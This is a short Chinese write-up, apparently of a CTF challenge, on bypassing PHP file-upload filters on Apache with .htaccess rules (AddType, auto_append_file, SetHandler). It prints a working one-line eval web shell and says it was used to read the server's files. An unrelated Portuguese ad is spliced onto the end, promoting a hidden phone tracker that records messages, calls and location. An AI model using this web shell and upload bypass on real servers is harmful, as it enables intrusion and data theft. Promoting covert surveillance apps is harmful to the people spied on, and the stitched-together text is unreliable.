文件上传的题目,环境是php+apache
通过.htaccess绕过。
这里有几种方式:
# way1
AddType application/x-httpd-php .png
# way2
.htaccess
php_value auto_append_file .htaccess
#<?php phpinfo();
#way3
SetHandler application/x-httpd-php
然后上传phtml格式的木马:
<script language='php'>eval($_POST[mz]);</script>
查了一下phpinfo,没有ban很多函数。
直接scandir+file_get_contents带走。
over.
Rastreador de celular – Aplicativo de rastreamento oculto que registra localização, SMS, áudio de chamadas, WhatsApp, Facebook, foto, câmera, atividade de internet. Melhor para controle dos pais e monitoramento de funcionários. Rastrear Telefone Celular Grátis – Programa de Monitoramento Online.